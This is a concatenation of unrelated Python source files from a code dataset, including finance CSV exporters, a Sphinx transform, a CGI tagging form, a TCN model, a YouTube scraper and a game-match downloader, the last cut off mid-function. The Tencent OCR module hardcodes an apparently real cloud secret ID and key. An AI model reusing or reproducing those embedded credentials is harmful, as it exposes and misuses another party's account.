]\n\n\ndef _export_exp_cat_iterator(queryset):\n yield [\n \"Budget Grouping\",\n \"Expenditure Category\",\n \"Description\",\n \"Further Description\",\n \"Budget NAC\",\n \"Budget NAC Description\",\n \"Operating Delivery Plan\",\n ]\n for obj in queryset:\n yield [\n obj.NAC_category.NAC_category_description,\n obj.grouping_description,\n obj.description,\n obj.further_description,\n obj.linked_budget_code.natural_account_code,\n obj.linked_budget_code.natural_account_code_description,\n obj.op_del_category.operating_delivery_description\n if obj.op_del_category\n else \"-\",\n ]\n\n\ndef _export_historical_exp_cat_iterator(queryset):\n yield [\n \"Budget Category\",\n \"description\",\n \"further description\",\n \"Budget Code\",\n \"Budget Description\",\n \"Budget Grouping\",\n \"financial year\",\n \"archived\",\n ]\n for obj in queryset:\n yield [\n obj.grouping_description,\n obj.description,\n obj.further_description,\n 
obj.linked_budget_code,\n obj.linked_budget_code_description,\n obj.NAC_category_description,\n obj.financial_year.financial_year_display,\n obj.archived,\n ]\n\n\ndef _export_comm_cat_iterator(queryset):\n yield [\"Commercial Category\", \"Description\", \"Approvers\"]\n for obj in queryset:\n yield [obj.commercial_category, obj.description, obj.approvers]\n\n\ndef _export_historical_comm_cat_iterator(queryset):\n yield [\n \"Commercial Category\",\n \"Description\",\n \"Approvers\",\n \"financial year\",\n \"archived\",\n ]\n for obj in queryset:\n yield [\n obj.commercial_category,\n obj.description,\n obj.approvers,\n obj.financial_year.financial_year_display,\n obj.archived,\n ]\n\n\ndef _export_op_del_cat_iterator(queryset):\n yield [\"Operating Delivery Plan Category\"]\n\n for obj in queryset:\n yield [obj.operating_delivery_description]\n\n\ndef _export_nac_cat_iterator(queryset):\n yield [\"Budget Grouping\"]\n\n for obj in queryset:\n yield [obj.NAC_category_description]\n\n\ndef _export_programme_iterator(queryset):\n yield [\"Programme Code\", \"Description\", \"Budget Type\", \"Active\"]\n for obj in queryset:\n yield [\n obj.programme_code,\n obj.programme_description,\n obj.budget_type.budget_type,\n obj.active,\n ]\n\n\ndef _export_historical_programme_iterator(queryset):\n yield [\n \"Programme Code\",\n \"Description\",\n \"Budget Type\",\n \"Active\",\n \"Financial Year\",\n \"Archived Date\",\n ]\n for obj in queryset:\n yield [\n obj.programme_code,\n obj.programme_description,\n obj.budget_type,\n obj.active,\n obj.financial_year.financial_year_display,\n obj.archived,\n ]\n\n\ndef _export_inter_entity_l1_iterator(queryset):\n yield [\"L1 Value\", \"L1 Description\"]\n for obj in queryset:\n yield [obj.l1_value, obj.l1_description]\n\n\ndef _export_fco_mapping_iterator(queryset):\n yield [\n \"FCO (Prism) Code\",\n \"FCO (Prism) Description\",\n \"Oracle (DIT) Code\",\n \"Oracle (DIT) Description\",\n \"Active\",\n ]\n for obj in queryset:\n yield [\n obj.fco_code,\n obj.fco_description,\n obj.account_L6_code_fk.natural_account_code,\n obj.account_L6_code_fk.natural_account_code_description,\n obj.active,\n ]\n\n\ndef _export_historical_fco_mapping_iterator(queryset):\n yield [\n \"FCO (Prism) Code\",\n \"FCO (Prism) Description\",\n \"Oracle (DIT) Code\",\n \"Oracle (DIT) Description\",\n \"Budget Grouping\",\n \"Budget Category\",\n \"Expenditure Type\",\n \"Active\",\n \"Financial Year\",\n \"Archived Date\",\n ]\n for obj in queryset:\n yield [\n obj.fco_code,\n obj.fco_description,\n obj.account_L6_code,\n obj.account_L6_description,\n obj.nac_category_description,\n obj.budget_description,\n obj.economic_budget_code,\n obj.active,\n obj.financial_year.financial_year_display,\n obj.archived,\n ]\n\n\ndef _export_inter_entity_iterator(queryset):\n yield [\"L1 Value\", \"L1 Description\", \"L2 Value\", \"L2 Description\", \"CPID\", \"Active\"]\n for obj in queryset:\n yield [\n obj.l1_value.l1_value,\n obj.l1_value.l1_description,\n obj.l2_value,\n obj.l2_description,\n obj.cpid,\n obj.active,\n ]\n\n\ndef _export_historical_inter_entity_iterator(queryset):\n yield [\n \"Government Body\",\n \"Government Body Description\",\n \"ORACLE - Inter Entity Code\",\n \"ORACLE - Inter Entity Description\",\n \"Treasury - CPID (Departmental Code No.)\",\n \"active\",\n \"financial year\",\n \"archived\",\n ]\n for obj in queryset:\n yield [\n obj.l1_value,\n obj.l1_description,\n obj.l2_value,\n obj.l2_description,\n obj.cpid,\n obj.active,\n 
obj.financial_year.financial_year_display,\n obj.archived,\n ]\n","sub_path":"chartofaccountDIT/exportcsv.py","file_name":"exportcsv.py","file_ext":"py","file_size_in_byte":8128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"105258981","text":"# -*- coding: utf-8 -*-\nfrom docutils import nodes\nfrom sphinx import transforms\nfrom sphinx.transforms import SphinxTransform\nfrom sphinx.util import logging\n\n\nclass IdgxmlFootnoteTransform(SphinxTransform):\n default_priority = 300\n\n def transform_indd_table(self):\n ths = self.document.traverse(nodes.thead)\n if len(ths) == 0:\n return\n for th in ths:\n tb = th.parent.traverse(nodes.tbody)[0]\n tb.insert(0, th.children[0])\n th.parent.remove(th)\n\n def transform_chaptered_doc(self):\n fns = self.document.traverse(nodes.footnote)\n fn_refs = self.document.traverse(nodes.footnote_reference)\n if 'docname' not in self.document.attributes:\n return\n for fn in fns:\n fn['ids'][0] = '{}-{}'.format(fn['docname'].split('/')[1], fn['ids'][0])\n for fn_ref in fn_refs:\n fn_ref['refid'] = '{}-{}'.format(fn_ref['docname'], fn_ref['refid'])\n\n def apply(self):\n # type: () -> None\n if 'indesign' not in self.app.builder.name:\n return\n\n if self.app.builder.name == 'chapteredindesign':\n self.transform_chaptered_doc()\n\n fns = self.document.traverse(nodes.footnote)\n fn_refs = self.document.traverse(nodes.footnote_reference)\n\n self.transform_indd_table()\n\n for fn_ref in fn_refs:\n for fn in fns:\n if fn['ids'][0] in fn_ref['refid']:\n if fn_ref in fn_ref.parent.children:\n fn_ref.parent.replace(old=fn_ref, new=fn.deepcopy())\n fn['classes'].append('obsolated')\n\n\ndef setup(app):\n app.add_post_transform(IdgxmlFootnoteTransform)\n","sub_path":"sphinxcontrib/indesignbuilder/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"22004938","text":"import itertools\nimport logging\nimport os\nimport re\nimport sets\nimport sys\nimport urllib\nfrom xml.sax import saxutils\n\nfrom minds.config import cfg\nfrom minds.cgibin.util import request\nfrom minds.cgibin.util import response\nfrom minds import weblib\nfrom minds.weblib import query_wlib\nfrom minds.weblib import store\n\nlog = logging.getLogger('cgi.wlibfrm')\n\n\n## todo: when nothing selected?\n\n# /weblib/multiform?action=organize&271=on&132=on&157=on&203=on\n# /weblib/multiform?method=POST&id_list=840&option=set_option&set_tags=tech&add_tags=&remove_tags=&action=OK&create_tags=\n\nTAG_DELETE, TAG_UNCHANGE, TAG_SELECT = range(1,4)\n\n\ndef main(rfile, wfile, env):\n req = request.Request(rfile, env)\n if req.method == 'GET':\n doShowForm(wfile, req)\n elif req.method == 'POST':\n doPost(wfile, req)\n elif req.method == 'DELETE':\n doDelete(wfile, req)\n\n\ndef _buildEntries(req):\n # scan for ddd=On from 'checkbox' fields or id_list='ddd,ddd' from 'hidden' field\n # build the id list ids.\n id_list = req.param('id_list').split(',')\n\n wlib = store.getWeblib()\n\n entries = []\n for k in itertools.chain(req.form.keys(), id_list):\n k = k.strip()\n if not k.isdigit():\n continue\n item = wlib.webpages.getById(int(k))\n if item:\n entries.append(item)\n\n return entries\n\n\ndef _buildChecklist(req):\n \"\"\" @return list of (tag, value) \"\"\"\n wlib = store.getWeblib()\n checklist = [] # list of (tag, flag)\n p = re.compile('\\@\\d+changed')\n for changed_key in req.form:\n if not 
p.match(changed_key):\n continue\n if not req.param(changed_key):\n continue\n key = changed_key[:-len('changed')] # strip 'changed' to get @id\n try:\n id = int(key[1:])\n except:\n continue\n tag = wlib.tags.getById(id)\n if not tag:\n continue\n flag = bool(req.param(key))\n checklist.append((tag,flag))\n\n return checklist\n\n\ndef doShowForm(wfile, req, errors=[], checklist=[], new_tags=[]):\n entries = _buildEntries(req)\n\n # build ids, names\n ids = [item.id for item in entries]\n names = [unicode(item) for item in entries[:3]]\n if len(entries) > 3:\n names.append('...')\n\n # TODO BUG: below will fail if there is no entries\n\n # build all_tags, some_tags\n all_tags = None\n some_tags = sets.Set()\n for item in entries:\n if all_tags == None:\n # only instantiate this the first time\n all_tags = sets.Set(item.tags)\n else:\n all_tags.intersection_update(item.tags)\n some_tags.union_update(item.tags)\n\n some_tags.difference_update(all_tags)\n tags = [(tag.name, tag.id, TAG_SELECT, False) for tag in all_tags] + \\\n [(tag.name, tag.id, TAG_UNCHANGE, False) for tag in some_tags]\n tags.sort()\n tags = [[id, name, flag, changed] for name, id, flag, changed in tags]\n\n # restore checkbox state from previous page\n for tag, flag in checklist:\n for tagItem in tags:\n if tagItem[0] == tag.id:\n # make flag either TAG_SELECT or TAG_DELETE\n tagItem[2] = flag and TAG_SELECT or TAG_DELETE\n tagItem[3] = True\n\n # refill if data entered for this form\n add_tags = req.param('add_tags')\n\n MultiFormRenderer(wfile).output(\n errors,\n new_tags,\n ids,\n names,\n tags,\n add_tags,\n )\n\n\ndef doPost(wfile, req):\n wlib = store.getWeblib()\n entries = _buildEntries(req)\n checklist = _buildChecklist(req)\n errors = []\n\n # parse add tags\n tags_description = req.param('add_tags')\n if weblib.Tag.hasIllegalChar(tags_description.replace(',',' ')):\n errors.append('These characters are not allowed in tag name: ' + weblib.Tag.ILLEGAL_CHARACTERS)\n tags_description = ''\n\n # check for new tags and the create_tags flag\n _, unknown = weblib.parseTags(wlib, tags_description)\n if unknown and (not req.param('create_tags')):\n tags = u', '.join(unknown)\n errors.append('These tags are not previous used: ' + tags)\n tags_description = ''\n\n # note: validation should be done, new tags will be created here\n set_tags = weblib.makeTags(store.getStore(), tags_description)\n remove_tags = []\n\n # going through checklist, add to set_tags, delete_tags\n for tag, flag in checklist:\n if flag:\n if tag not in set_tags:\n set_tags.append(tag)\n else:\n remove_tags.append(tag)\n\n if errors:\n doShowForm(wfile, req, errors, checklist=checklist, new_tags=unknown)\n return\n\n log.debug('EditTags for %s entries set(%s) remove(%s).', len(entries), set_tags, remove_tags)\n wlib.editTags(entries, [], set_tags, remove_tags)\n store.getStore().refresh_when_needed()\n\n response.redirect(wfile, '/updateParent')\n\n\ndef doDelete(wfile, req):\n wlib = store.getWeblib()\n entries = _buildEntries(req)\n for item in entries:\n try:\n log.debug('Delete web page: %s', unicode(item))\n store.getStore().removeItem(item)\n except:\n log.exception('Unable to delete: %s', unicode(item))\n store.getStore().refresh_when_needed()\n\n response.redirect(wfile, '/updateParent')\n\n\n# ----------------------------------------------------------------------\n\nclass MultiFormRenderer(response.CGIRenderer):\n TEMPLATE_FILE = 'weblibMultiForm.html'\n \"\"\" 2005-12-09\n con:form\n con:id_list\n con:error\n con:message\n rep:title\n 
rep:tag\n con:checkbox\n con:hidden\n con:tagName\n con:add_tags\n con:new_tags_js_var\n \"\"\"\n def render(self, node, errors, new_tags, ids, names, tags, add_tags=''):\n \"\"\"\n @param tags - list of (id, name, flag, changed)\n \"\"\"\n\n form = node.form\n if errors:\n escaped_errors = map(saxutils.escape, errors)\n form.error.message.raw = '
'.join(escaped_errors)\n else:\n form.error.omit()\n\n form.id_list.atts['value'] = ','.join(map(str,ids))\n\n form.title.repeat(self.renderTitle, names)\n\n form.tag.repeat(self.renderTag, tags)\n\n form.add_tags.atts['value'] = add_tags\n\n tags = new_tags and u', '.join(new_tags) or ''\n encode_tags = response.jsEscapeString(tags)\n node.form.new_tags_js_var.raw = node.form.new_tags_js_var.raw % encode_tags\n\n\n def renderTitle(self, node, title):\n node.content = title\n\n\n def renderTag(self, node, item):\n id, tag, flag, changed = item\n node.checkbox.atts['name'] = '@%s' % id\n node.hidden.atts['id'] = node.hidden.atts['id'] % id\n node.hidden.atts['name'] = node.hidden.atts['name'] % id\n node.tagName.content = tag\n\n # set/restore the checked and changed state\n node.atts['class'] = (flag == TAG_UNCHANGE) and 'tagUnchange' or 'tagChange'\n if flag == TAG_DELETE:\n del node.checkbox.atts['checked']\n if changed:\n node.hidden.atts['value'] = '1'\n\n\nif __name__ == \"__main__\":\n main(sys.stdin, sys.stdout, os.environ)","sub_path":"trunk/minds/cgibin/weblibMultiForm.py","file_name":"weblibMultiForm.py","file_ext":"py","file_size_in_byte":7262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"74694746","text":"import torch.nn.functional as F\nfrom torch import nn\nfrom models.tcn import TemporalConvNet\nimport torch\n\nclass TCN(nn.Module):\n def __init__(self, **kwargs):\n super(TCN, self).__init__()\n self.input_size = kwargs['input_channels']\n self.wavelet = kwargs['wavelet']\n self.input_length = kwargs['input_length']\n output_size = kwargs['output_size']\n kernel_size = kwargs['kernel_size']\n dropout = kwargs['dropout']\n num_channels = kwargs['channel_lst']\n wavelet_output_size = kwargs['wavelet_output_size']\n num_channels = [int(x) for x in num_channels.split(',')]\n linear_size = num_channels[-1]\n\n if self.wavelet:\n self.input_size = self.input_size//2\n wvlt_size = self.input_length * self.input_size // 2\n self.linear_wavelet = nn.Linear(wvlt_size, wavelet_output_size)\n linear_size += 2 * wavelet_output_size\n\n self.tcn = TemporalConvNet(\n self.input_size,\n num_channels,\n kernel_size=kernel_size,\n dropout=dropout)\n \n self.input_bn = nn.BatchNorm1d(linear_size)\n self.linear = nn.Linear(linear_size, output_size)\n \n\n def forward(self, inputs, positive, negative, need_triplet_emb=True):\n \"\"\"Inputs have to have dimension (N, C_in, L_in)\"\"\"\n if self.wavelet:\n splits = torch.split(inputs, self.input_size, dim=2)\n inputs = splits[0]\n wvlt_inputs = splits[1]\n wvlt_inputs_1 = torch.split(wvlt_inputs,\n self.input_length // 2,\n dim=1)[0]\n wvlt_inputs_2 = torch.split(wvlt_inputs,\n self.input_length // 2,\n dim=1)[1]\n bsize = inputs.size()[0]\n wvlt_out1 = self.linear_wavelet(\n wvlt_inputs_1.reshape(bsize, -1, 1).squeeze())\n wvlt_out2 = self.linear_wavelet(\n wvlt_inputs_2.reshape(bsize, -1, 1).squeeze())\n\n inputs = inputs.permute(0, 2, 1)\n y1 = self.tcn(inputs) # input should have dimension (N, C, L)\n last = y1[:, :, -1]\n \n if self.wavelet:\n last = torch.cat([last, wvlt_out1, wvlt_out2], dim=1)\n\n normalized = self.input_bn(last)\n o = self.linear(normalized)\n # return o, {'orig': last, 'pos': None, 'neg': None}\n return o, {'orig': normalized, 'pos': None, 'neg': None}\n\n","sub_path":"models/tcn_model.py","file_name":"tcn_model.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} 
+{"seq_id":"306750539","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n 腾讯手写体识别\n\"\"\"\n\n__author__ = 'Van23qf'\n\n\nimport base64\nimport json\n\nfrom tencentcloud.common import credential\nfrom tencentcloud.common.profile.client_profile import ClientProfile\nfrom tencentcloud.common.profile.http_profile import HttpProfile\nfrom tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException\nfrom tencentcloud.ocr.v20181119 import ocr_client, models\n\n\ndef ocr(pic):\n try:\n with open(pic, 'rb') as f:\n f1 = f.read()\n pic_base64 = str(base64.b64encode(f1), 'utf-8')\n cred = credential.Credential(\"AKID96rMeho9uQiqjRvCI8C3f6esstjMjFZi\", \"3toZ7RmtlSv9EA0f8LNJ6i6MOYXHoQr5\")\n httpProfile = HttpProfile()\n httpProfile.endpoint = \"ocr.tencentcloudapi.com\"\n\n clientProfile = ClientProfile('TC3-HMAC-SHA256')\n clientProfile.httpProfile = httpProfile\n client = ocr_client.OcrClient(cred, \"ap-guangzhou\", clientProfile)\n\n req = models.GeneralHandwritingOCRRequest()\n params = '{\"ImageBase64\":\"' + pic_base64 + '\"}'\n req.from_json_string(params)\n\n resp = client.GeneralHandwritingOCR(req)\n resp = json.loads(resp.to_json_string())\n if not resp.get('TextDetections'):\n return {'status': False, 'msg': '识别失败'}\n data = []\n for v in resp['TextDetections']:\n data.append(v['DetectedText'])\n return {'status': True, 'msg': 'success', 'data': data}\n except FileNotFoundError as err_file:\n return {'status': False, 'msg': err_file.strerror}\n except TencentCloudSDKException as err:\n return {'status': False, 'msg': err.get_message()}\n\n\nif __name__ == '__main__':\n result = ocr('../uploads/jibing.png')\n print(result)\n","sub_path":"api/TencentHandwriting.py","file_name":"TencentHandwriting.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"423810263","text":"from django.conf.urls import url\nfrom views import (\n descriptor,\n sso_idp_select,\n sso_response,\n sso_single_logout,\n sso_test,\n)\n\nurlpatterns = [\n url(r'^test/$', sso_test),\n url(r'^idpselect/$', sso_idp_select),\n url(r'^acs/$', sso_response),\n url(r'^singlelogout/$', sso_single_logout, name='sso_single_logout'),\n url(r'^metadata/', descriptor, name='spssodescriptor'),\n]\n","sub_path":"saml2sp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"251376814","text":"#coding=utf8\r\n__author__ = 'Administrator'\r\n#与运算符类似,许多内置函数也都是调用对象的特殊方法。比如:\r\n\r\nlen([1,2,3]) # 返回表中元素的总数\r\n#实际上做的是:\r\n[1,2,3].__len__()\r\n#相对与__len__(),内置函数len()也起到了简化书写的作用。\r\n\r\n#下面是我们常见的表元素引用方式:\r\nli = [1, 2, 3, 4, 5, 6]\r\nprint(li[3])\r\n#上面的程序运行到li[3]的时候,Python发现并理解[]符号,然后调用__getitem__()方法。\r\nli = [1, 2, 3, 4, 5, 6]\r\nprint(li.__getitem__(3))\r\n#------------------------------\r\nprint(\"------------------------------\")\r\n#任何一个有__call__()特殊方法的对象都被当作是函数。比如下面的例子:\r\nclass SampleMore(object):\r\n def __call__(self, a):\r\n return a + 5\r\n\r\nadd = SampleMore() # A function object\r\nprint(add(2)) # Call function\r\nmap(add, [2, 4, 5]) # Pass around function object\r\n","sub_path":"pythonDemo/src/main/tuLing2Version/raise/Built_in_function.py","file_name":"Built_in_function.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"224302244","text":"#\n# Copyright (c) 2015-2019 
Thierry Florac \n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n\n\"\"\"PyAMS_site.scripts module\n\nThis module provides a \"pyams_upgrade\" command line utility, which can be used to\n\"upgrade\" a site, which means creating all its required persistent utilities and\nregistering them into its local site manager.\n\"\"\"\n\nimport argparse\nimport sys\nimport textwrap\n\nfrom pyramid.paster import bootstrap\n\nfrom pyams_site.generations import upgrade_site\n\n\n__docformat__ = 'restructuredtext'\n\n\ndef pyams_upgrade_cmd():\n \"\"\"Check for site upgrade\"\"\"\n usage = \"usage: {0} config_uri\".format(sys.argv[0])\n description = \"\"\"Check for database upgrade.\n Usage: pyams_upgrade production.ini\n \"\"\"\n parser = argparse.ArgumentParser(usage=usage,\n description=textwrap.dedent(description))\n parser.add_argument('config_uri', help='Name of configuration file')\n args = parser.parse_args()\n\n config_uri = args.config_uri\n env = bootstrap(config_uri)\n closer = env['closer']\n try:\n upgrade_site(env['request'])\n finally:\n closer()\n","sub_path":"src/pyams_site/scripts/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"399933970","text":"from src.databases.DropsDAO import DropsDAO\nfrom src.Utils import Utils\nimport json\n\nclass Admin:\n\n def __init__(self, config):\n self.drops_dao = DropsDAO(config)\n self.config = config\n self.utils = Utils()\n \n \n\n def add_role_to_role(self, email, role):\n user_id = self.drops_dao.select_user_id_by_email(email)\n if user_id is None:\n return None\n current_roles = self.drops_dao.select_user_role_by_id(user_id[0])\n if current_roles is None:\n return None\n roles = str(current_roles[0]).split(\",\")\n if role in roles:\n print(\"user \" + email + \" already has the role \" + role + \"\\n\")\n return None\n new_roles = str(current_roles[0]) + \",\" + role\n update = self.drops_dao.update_user_role_by_id(user_id[0], new_roles)\n \n def add_list_of_roles(self, jsonfile):\n for entry in jsonfile['entities']:\n self.add_role_to_role(entry['email'], 'employee')\n self.add_role_to_role(entry['email'], entry['entity'])\n\n\n\n def add_oauth_client(self, client_id, client_secret, redirect_uri):\n result = self.drops_dao.add_oauth_client(client_id, client_secret, redirect_uri)\n print(result)\n\n def parser(self, subparsers):\n parser = subparsers.add_parser('admin', help='setup docker ')\n parser.add_argument(\n '-r', '--role',\n nargs=2,\n metavar=('email, role'),\n help=\"add role to user\"\n )\n parser.add_argument(\n '-l', '--list',\n nargs=1,\n metavar=('list'),\n help=\"add list of email role tuple\"\n )\n parser.set_defaults(which=\"admin\")\n return parser\n\n def execute(self, args, parser):\n if args.role is not None:\n output = self.add_role_to_role(args.role[0], args.role[1])\n print(output)\n elif args.list is not None:\n json_file = self.utils.load_json_from_file(args.list[0])\n self.add_list_of_roles(json_file)\n else:\n 
parser.print_help()\n","sub_path":"src/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"323609018","text":"# -*- coding: utf-8 -*-\n# Sage introspection build configuration file.\n# See sage.server.notebook.cell.set_introspect_html() for details.\n\nimport sys, os\nsys.path.append(os.environ['SAGE_DOC'])\nfrom common.conf import *\n\nextensions = ['sphinx.ext.autodoc', 'sphinx.ext.jsmath', 'sphinx.ext.todo',\n 'sphinx.ext.extlinks']\n\ntemplates_path = ['templates']\nhtml_static_path = ['static']\n\nhtml_use_modindex = False\nhtml_use_index = False\nhtml_split_index = False\nhtml_copy_source = False\n\ntodo_include_todos = True\n","sub_path":"doc/en/introspect/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"35197986","text":"#Project Started On: 25 - Oct - 2020\r\n#REQUIREMENTS: This scripts takes a url, URL Should be of youtube page.\r\n#WORKING: After this takes arguments, it will crawl the whole page and exract the titles of each video that is in the page.\r\nimport os, sys\r\nfrom bs4 import BeautifulSoup as bs\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom selenium.webdriver.common.keys import Keys\r\nimport time\r\nimport pandas as pd\r\ndef scrape_video_titles(playlist_url: str, opts: Options):\r\n assert isinstance(playlist_url, str)\r\n Chromepath = input('Enter the Path Of Chrome Webdriver')\r\n driver = webdriver.Chrome(options=opts, executable_path=Chromepath)\r\n driver.get(playlist_url)\r\n # get html\r\n elem = driver.find_element_by_tag_name('html')\r\n elem.send_keys(Keys.END)\r\n time.sleep(3)\r\n elem.send_keys(Keys.END)\r\n innerHTML = driver.execute_script(\"return document.body.innerHTML\")\r\n driver.close()\r\n # parse the html\r\n page_soup = bs(innerHTML, 'html.parser')\r\n res = page_soup.find_all('a', {'class': 'yt-simple-endpoint style-scope ytd-video-renderer'},)\r\n # get titles\r\n# print(res)\r\n titles=[]\r\n for video in res:\r\n if video.get('title') != None:\r\n titles.append((video.get('title')))\r\n return titles\r\nif __name__ == \"__main__\":\r\n print('Make sure that you are using terminal (Like termux)')\r\n clearType = input('This is Terminal YES OR NO? 
(y/n): ').lower()\r\n if clearType == 'y':\r\n clear = lambda:os.system('clear')\r\n elif clearType == 'n':\r\n sys.exit()\r\n else:\r\n print('Invalid input!!!')\r\n sys.exit()\r\n print('Installing The dependencies That are required')\r\n colors = {\r\n \"re\": \"\\u001b[31;1m\",\r\n \"gr\": \"\\u001b[32m\",\r\n \"ye\": \"\\u001b[33;1m\",\r\n }\r\n wt = (\r\n \"\"\"\r\n VIASK\r\n \"\"\"\r\n )\r\n time.sleep(1)\r\n re = \"\\u001b[31;1m\"\r\n gr = \"\\u001b[32m\"\r\n ye = \"\\u001b[33;1m\"\r\n if sys.version_info[0] < 3:\r\n telet = lambda :os.system('pip install -U beautifulsoup4')\r\n telet1 = lambda :os.system('pip install -U selenium')\r\n telet2 = lambda :os.system('pip install -U pandas') \r\n elif sys.version_info[0] >= 3:\r\n telet = lambda :os.system('pip install -U beautifulsoup4')\r\n telet1 = lambda :os.system('pip install -U selenium')\r\n telet2 = lambda :os.system('pip install -U pandas') \r\n telet()\r\n telet1()\r\n telet2()\r\n time.sleep(1)\r\n print(wt)\r\n clear()\r\n urls= input(re+'Enter the URL of the youtube page:')\r\n filename1 = input(gr+'Enter the saving name of file')\r\n filename = filename1 + '.txt'\r\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'\r\n opts = Options()\r\n opts.add_argument(f'user-agent={user_agent}')\r\n #urls = pd.read_csv('C:/Users/Nautiyal/Desktop/youtube.csv')\r\n save_path = filename\r\n # get titles\r\n print(re+'Running ........ ')\r\n titles = scrape_video_titles(urls, opts)\r\n with open(save_path, 'a', encoding=\"utf-8\") as f:\r\n f.write(str(titles))\r\n print(re+'Successfully Saved ','\\n',':-)','\\n','#VIASK')\r\n print(ye+wt)\r\n","sub_path":"Titles Scraping Main.py","file_name":"Titles Scraping Main.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"489805372","text":"##This is the compute file \n\n##Note: Some of the implementations may be more accurate than others due to the dynamic step size \n\ndef hsb_substation_compute (hsb_ss_dc):\n\n ##hsb_ss_dc --- list of input values \n ##hsb_ss_dc[0,0] = hsb_ss_demand\n ##hsb_ss_dc[1,0] = hsb_ss_totalflownwk\n ##hsb_ss_dc[2,0] = hsb_ss_cp\n ##hsb_ss_dc[3,0] = hsb_ss_tinmax\n ##hsb_ss_dc[4,0] = hsb_ss_deltmax\n \n import numpy as np \n \n ##Calculating the constant value for the exting stream\n if hsb_ss_dc[1,0] == 0:\n exit_cst_value = 0\n else:\n flow = hsb_ss_dc[1,0] * 998.2 / 3600\n exit_cst_value = hsb_ss_dc[0,0] / (flow * hsb_ss_dc[2,0])\n \n ##Calculating the constraint equation coefficient \n if hsb_ss_dc[0,0] == 0:\n constraint_eqn_coeff = 0\n else:\n constraint_eqn_coeff = (flow * hsb_ss_dc[2,0]) / hsb_ss_dc[0,0] \n \n \n ##Initiate a matrix to hold the return values \n hsb_ss_calc = np.zeros((2,1))\n \n hsb_ss_calc[0,0] = exit_cst_value\n hsb_ss_calc[1,0] = constraint_eqn_coeff\n\n return hsb_ss_calc ","sub_path":"milp/milp_models/hsb_substation_compute.py","file_name":"hsb_substation_compute.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"362918063","text":"import DataPuller as d\nimport requests \nimport json\nimport os\nimport sys\nimport threading\nimport time\nimport zipUtilities as zu\nfrom zipfile import ZipFile\nfrom matchPusher import pushMatchesToSiteFromZip\nfrom datetime import datetime\n\ndef getAllMatchesForSummoner(summoner_name, season, region, players_to_add = 0, player_ids 
= {}):\n account_id = d.getAccountIdByName(summoner_name, region)\n begin_index = 0\n num_unique_games_for_summoner = 0\n num_duplicates = 0\n\n # Grab the first game of the season, then we can find how many games we'll need to officially grab.\n # Note the hard-coded 0, 100 -- just grab the first 100 games\n match_json = d.getMatchesByAccountId(account_id, region, season, d.RANKED_SOLO_QUEUE, 0, 100)\n\n if 'totalGames' in match_json:\n total_games = match_json['totalGames']\n else:\n print(\"No games found for this summoner.\")\n return\n\n res_tuple = save_match_ids(match_json, player_ids, players_to_add, region, season)\n num_unique_games_for_summoner += res_tuple[0]\n num_duplicates += res_tuple[1]\n\n while begin_index < total_games:\n begin_index += 100 # Add 100 to begin_index so the next loop keeps going\n # Note, this request assumes that the Riot API doesn't care if we\n # request more than the total number of games. I think that makes sense\n match_json = d.getMatchesByAccountId(account_id, region, season, d.RANKED_SOLO_QUEUE, begin_index, begin_index + 100)\n \n\n # Consider upping total_games... since this sometimes is weird and increases the more requests we have. Not sure why, I think this is a bug on their side tho\n if 'totalGames' in match_json:\n total_games = match_json['totalGames']\n\n # Save the unique game_ids\n res_tuple = save_match_ids(match_json, player_ids, players_to_add, region, season)\n num_unique_games_for_summoner += res_tuple[0]\n num_duplicates += res_tuple[1]\n\n # Display how many games we downloaded, compared to how many total games they have\n print(str(num_unique_games_for_summoner) + \" unique games [\" + \"{:.1%}\".format(num_unique_games_for_summoner / (num_unique_games_for_summoner + num_duplicates)) + \"] downloaded for \" + summoner_name)\n\n\ndef get_games_not_on_db(games_arr):\n # Do a remote query\n headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}\n response = requests.post('http://teamcomps.org:2021/matches/existence', data = json.dumps(games_arr), headers = headers)\n return response.json()\n\n# Parameters:\n# match_json: list of matches, basically\n# player_dic: list of players that we want to download games for\n# players_to_add: max numbers of players to queue up to add games for\n# region: \n# season: \n# Returns: Tuple, 